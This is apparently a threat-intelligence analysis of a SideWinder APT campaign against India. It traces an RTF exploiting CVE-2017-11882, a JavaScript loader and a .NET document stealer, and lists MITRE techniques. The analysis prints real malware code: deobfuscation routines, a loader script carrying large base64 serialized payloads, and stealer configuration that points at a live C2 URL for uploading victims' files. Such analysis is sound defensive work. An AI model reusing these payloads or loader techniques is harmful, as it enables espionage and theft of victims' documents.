<h6>The initial vector is an RTF file who use an well-know vulnerability (CVE-2017-11882) for execute a js script (1.a) form the package of OLE objects. </h6>
function EvpTXkLe(bsix){ return SJnEuQM(keeee,RDDb(bsix))}
var keeee = SJnEuQM("YjfT",RDDb("altWY2"+"hcV2xq"+"XA=="));
```
<h6>This series of functions perform the decryption of the base64 and xor by a constant encoded key (keeee), this can be merged on one single next function</h6>
```javascript
function EvpTXkLe(bytes)
{
var b,b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",result = "",r1,r2, i = 0,res = [],key ="3107161836";
for (; i <bytes.length;)
{
b = b64.indexOf(bytes.charAt(i++)) <<18|b64.indexOf(bytes.charAt(i++))<<12|(r1 =b64.indexOf(bytes.charAt(i++)))<<6|(r2 =b64.indexOf(bytes.charAt(i++)));
result += r1 === 64 ? String.fromCharCode(b >> 16) : r2 === 64 ? String.fromCharCode(b >> 16 & 255, b >> 8 & 255) : String.fromCharCode(b >> 16 & 255, b >> 8 & 255, b & 255);
<h6>The first block inside the try/catch is for initialize theposition of the window outside the display and payload to inject in the process</h6>
```javascript
var mst = null;
var FSO = null;
window.resizeTo(1, 1);
window.moveTo(-1000, -1200);
var shells = new ActiveXObject("WScript.Shell");
var so = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkDAAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAHdGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAACQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0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
```
<h6>The next block is two functions one used for write the payload at inject and the second for check the version .NET on the system</h6>
<h6>The last block contains the vulnerable legit software and a well-know loader used by Sidewinder, this run the correct version to use in .NET by an dynamicinvoke</h6>
```javascript
ver = "v2.0.50727";
try
{
FSO = new ActiveXObject("Scripting.FileSystemObject");
var fmt = new ActiveXObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter");
var al = new ActiveXObject("System.Collections.ArrayList");
var d = fmt["Deserialize_2"](mst);
al.Add(undefined);
var o = d["DynamicInvoke"](al.ToArray())["CreateInstance"]("StInstaller.Program");
var x = "H4sIAAAAAAAAA+1XXWwcVxX+7nh/xmt7E9vUdYmdjMkPmx8WOzVNKtLi36Sb2rHldX4IKfZ4d2wPnZ3Zzswau4LIfWilPDRtpAraiAdeeKsqkBCESohKiJKH9gX1gUoo9AFeQIUCb0g0fPfO/thO1EY8BFXy2b3nnnPuueeec+7vTF58GU0AYiy3bwM3EMEQPh3WWdJ73kzjp83v9t0QE+/2zS7bgVH2vSXfLBkF03W90FiwDL/iGrZrjE3ljZJXtLJtbal9VRvT48CEiKF88+2nanY/gNbXInQgRUaPZN/MEBl1x3YqWov8Bho1fthgmjD0vFSV/0YdVTrtSJOtRFNSOA+8qt09yJ33kIs7wKi7rkAn/8QGPhtaqyHrol6NK7UxiLqJ+WxQNEMTWJQC+ixjRnqzHsVvZf3AL6Aaw3zV1s479IayvuV4hWrTetXe5+7QG7m3ILfhsw5DmaiWa1NDHDf6uC8S0bL4JIhlNq/vGnT2x2GzFkB7hgdLyuNCTGXiRD5lZWk7lUlKJDd4KnHV3mN8/UXSoiWxx0h2Ja/amWa2dLUe7krqL8mG/acS+h7jqWvm72b0By+06lQ5+qdkhjsmtU6bsUOfz3CQRK3Crv4mtV8YQ/tlqeC1yKG6Wg4PJZLXW3WvVXpzWHrTRurIAT3DHZVqa/Z2yIavssHj/kg1d73ICITXTvrA4VTywQstSfp79M1b6QO3WjIdMrpOoj8colZPFP/582iSnWT+Ll5EC/qw3tmv4XHI8wjtTcrtukNfuKtDuh7LcE+mDtWH/H3wAPlnd2uZLinnBs2fHhEyywT2xsrRbH/2K/3Hjh6Tkjgc4gyd2HsZeIV1WdL50LfdpUDNXzya871n85iIR+fB3lNnc2OsL5F/R/IjjrdQnVd2F+cf0NAsmX+Lh9Gl5hidUVyKTkR6sknVNXm0lpq0yNsEDvGwS2Ba4Qpc4qv4DvGv8Qvi95XkQ0XfVnRMSNyisCFkr6yix4TsVVT084q+TpzCr8TrIoFbSv4PYlT9kFjgOZJd2m6tTXGCke8nl1OrfwBHtDKmDal7rfsRLWT7bxT3PTymrZJ7p8rlFPdepIldQmoW+yT3ArnL5N6IuO7T9CLKxKwmc1HQmnGaXDtkSx++T4/78Dp24CBuMp8DvP8k/Wd041H8E7uRQ7vYR51d4svED4tHuMOmxA5qXhAn8AxcMYKH8F3xBEy8LCbxHH4k8riC34qLxO8zF1JnDq+pEa8pnOXSfIG4Ey/hDfwMbyG2vnUvL2ubz4EltGnAVpnbYE5MesWKYz2O/FoQWqXsTMUN7ZKVHfVKZdux/Lzlr9gFK0AkMEPbc2csx1xVVDAccn0uVEIL2ULo+ah2l8pUWLAdO1xr6ERjYGrhW1YhrI9oLTpkaQ3DQWCVFpw1nLLC8VWrUAm59uvCJSucm/AKauBa59wUps1wWXYYs31L+rB2xixxKLVvMOvbJen6gu1aOMmAMGOZxWHHGVkLGZTEGKksLlo+hn3fXAP3T+HpUa+8hgnPLGLUdJxRz10ZLVoFB7NrZSvyrez5oVWUfIBJumf5OXfRUy6q4b3y3PgzFVOGj2EGt2LK7Iz6lhlaOTcITbegLCmLk1a47BWVAYoiriocMQMLOXfFe7qWveyYbS65XhDahQDTvse5CWS30YrvW25YkzxpOw4mTT9YNhkrc1xNuhxQRja+WrDKKpNjZ/PjM9ki1UtBwfMde0Galc9BRGtDZYIJmjNrM5EtqMnOuXZ4yiwy6EDldsYul6lXdipLtlufNtPn8aUGkevt4Enc2w87puGDKSU2UQJa8ghJ+ZBvsEf/db37vf/88ckrP/no5odv/+WviBlC6E0G+C5FRzuJdAwinY5DS0sseuPpFOKi46DOv56A6GjvjccN9HYMUEdTOj0dAzEDFBii47F0wtB6enp7pL3xJDQ29vboP3/20rmHBj+40pTgIDwgeOwaXxJJqvbG2SyqF+xuoc6OrvO+WT7jufVkzy773rcDkUw2UT2uNydjHF/vGOjRKVHU1g2N2/v5uNu5kY9Jfii6+wczjZYztff2XWAos5GbG/X8MceZNG03mnTLUgugOp7xvz2ft+H+AM/yRFN0dde/wb4x1Li3Zeknf5xliOVvXwQ+ZhkjPVXV27BdN+7iS43DYBs+GyDUZu2Ovgw3yeU8999FLkG+Iy/M8/rf8DA4oQ0Sn0Mec8TjmCGV45f2GfI54pPRVzd+Gfv7xzU7G+Fr1Vp+xm79FhlTI59T5/dJvoUc8FrjO2SRJ7yEfarXrDrrXQRsN3nO22ytvVV+HPuBkDbkLeCzxeXNcKelVaXTX/8NYkHmAEfokajrj7EEKCg75U3jGCpn+gbdcyw+tRs6/XyDNQo4Ror60odQ6br03WG+5K1lqdjP0muZzyyKbFHvfOXPBNuXlPYorZexpjxawrK646QvJ5Ttqarcrtqu+eZ+4hiDKo7oFi3y1V6g1a3RbI3luOozTI2AmiVmz6FXxqf224b7CEb07ffRMRyfP/7/dmYb7jf8FwhqXLMAFgAA";
var y = "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
var m = o.Work;
```
<h6>Finally still execute the process with loader and the code to inject by process injection if throws an exception and close the window whatever the result</h6>
###### We can note that ``` 202/KfzLXf6NisWqPtYOrrQYJfzErkCyS8ib8dz3QSsN/1115/2280/16331af8 ``` show like an internal reference for the SideWinder group, this is used as identifier in the communications with the C2 for the data sent. The path of the origin directory is encoded in base 64.
<h6>The first software is a legit wizard EFS REKEY of Microsoft know as rekeywiz.exe. This can do the certificates for the EFS, we can confirm it on the code of the software.</h6>
<h6> On the dotnet loader, we can load an instance from the code extracted by the module. This module use an xor in a loop of the bytes for get the payload to execute. </h6>
public long OffsetPosition {get{return this._offsetPosition;}}
// Token: 0x04000024 RID: 36
public readonly string _path;
// Token: 0x04000025 RID: 37
public readonly long _offsetPosition;
}
}
}
```
###### The second module, this select the good extension instead of the content to push, this use too a popular JSON framework for .NET (Newtonsoft). Once the files done, this add a queue for send files at the C2 by zip files. The origin path, type, offset of the files of the victim is push in base 64 in the X-File references in the header. The JSON files are still stored in Appdata with a folder with the identicator name ```CommonsDat``` instead of ```AuthyDat``` for the last operation against China (cf last analysis) </h6>
<h6> The third module gives the functions for encode and decode the data to put in the files, the algorithms are the same as for decrypt the payload (as reuse code). This also has functions for reading and writing files, and saving and reading the configuration. </h6>
if (!Directory.Exists(this._outputFolder)){Directory.CreateDirectory(this._outputFolder);}
string text = bR.ReadString();
if (string.IsNullOrEmpty(text)){this._serverUri = new Uri("https://ap1-acl.net/202/KfzLXf6NisWqPtYOrrQYJfzErkCyS8ib8dz3QSsN/1115/2280/16331af8 ".Trim());}
else{this._serverUri = new Uri(text);}
this._getInterval = bR.ReadInt32();
this._postInterval = bR.ReadInt32();
this._doSysInfo = bR.ReadBoolean();
this._doFileSelection = bR.ReadBoolean();
this._doFileUpload = bR.ReadBoolean();
int num = bR.ReadInt32();
this._selectFileExtensions = new string[num];
for (int i = 0; i <num;i++){this._selectFileExtensions[i]=bR.ReadString();}
this._maxSelectFileSize = bR.ReadInt32();
int num2 = bR.ReadInt32();
this._selectedFiles = new List<Settings.File>(num2);
for (int j = 0; j <num2;j++){this._selectedFiles.Add(newSettings.File(bR));}
int num3 = bR.ReadInt32();
this._outputFiles = new List<Settings.File>(num3);
for (int k = 0; k <num3;k++){this._outputFiles.Add(newSettings.File(bR));}
<h6> The last module give all the functions used for parsed the information about system, users, privileges, security products, HotFix, network settings...</h6>
private static extern bool GetTokenInformation(IntPtr tokenHandle, SysInfo.TokenInformationClass tokenInformationClass, IntPtr tokenInformation, int tokenInformationLength, out int returnLength);
foreach (IPAddress ipaddress in ipproperties.DhcpServerAddresses){jsonWriter.WriteValue(ipaddress.ToString());}
jsonWriter.WriteEndArray();
jsonWriter.WritePropertyName("dnsAddresses");
jsonWriter.WriteStartArray();
foreach (IPAddress ipaddress2 in ipproperties.DnsAddresses){jsonWriter.WriteValue(ipaddress2.ToString());}
jsonWriter.WriteEndArray();
jsonWriter.WritePropertyName("winsAddresses");
jsonWriter.WriteStartArray();
foreach (IPAddress ipaddress3 in ipproperties.WinsServersAddresses){jsonWriter.WriteValue(ipaddress3.ToString());}
jsonWriter.WriteEndArray();
jsonWriter.WritePropertyName("gatewayAddresses");
jsonWriter.WriteStartArray();
foreach (GatewayIPAddressInformation gatewayIPAddressInformation in ipproperties.GatewayAddresses){jsonWriter.WriteValue(gatewayIPAddressInformation.Address.ToString());}
jsonWriter.WriteEndArray();
jsonWriter.WritePropertyName("ipAddresses");
jsonWriter.WriteStartArray();
foreach (UnicastIPAddressInformation unicastIPAddressInformation in ipproperties.UnicastAddresses)
<h3> Files push in Appdata<aname="Files"></a></h3>
###### The stealer stock in the disk multiples files with differents results of the operations perform on the computer:
+ A file with a sif extension :
###### This content the system and user account informations steal by the backdoor and which send to the C2 when the connection is etablish (JSON file).
###### A second JSON file which content the list of the path of the document to steal and push on the C2 (target the xls, xlsx, doc, docx, pdf documents).
<h6>For resume the list of extension and roles of the files dropped in the computer</h6>
|Extension|Data|
| :---------------: | :---------------: |
|.sif|System informations of the victim|
|.flc|List of the files on the computer|
|.fls|List of the files selected to send to the C2|
|.err|Common extension for throws an exeception in the current process of crawling of informations and data|
###### The C2 domain is the only one recorded on the IP hosted for the operations and probably active since late October 2019. A interesting thing to related at the C2 in india is this wait generally a month before the operations, which would go back to the beginnings of the operation in mid-december.
<h3> Military activities in India <aname="Military"></a></h3>
<h6> The year 2019 was bad for India, constantly attacked by Pakistan, China and North Korea on these different production environments and on these industrial secrets like aerospace, aviation and the energy sector for example. Recently, a series of military exercises by India take place as reported by <ahref="https://twitter.com/detresfa_">detresfa_</a>:</h6>
<h6>India seems to resume activities by trapping these too curious people with a document weaponized with the content of a old security measure of 2017 (the content of the document can be viewed <ahref="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Indian/APT/SideWinder/25-12-19/Ressources/content_Policy_on_Embedded_Systems.txt">here</a>)</h6>
|Execution|Execution through Module Load<br>Exploitation for Client Execution|https://attack.mitre.org/techniques/T1129/<br>https://attack.mitre.org/techniques/T1203/|
|Persistence|Registry Run Keys / Startup Folder|https://attack.mitre.org/techniques/T1060/|
<h6> This can be exported as JSON format <ahref="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Indian/APT/SideWinder/25-12-19/JSON/MITRE_ref.json">Export in JSON</a></h6>
<h2>Yara Rules<aname="Yara"></a></h2>
<h6> A list of YARA Rule is available <ahref="">here</a></h6>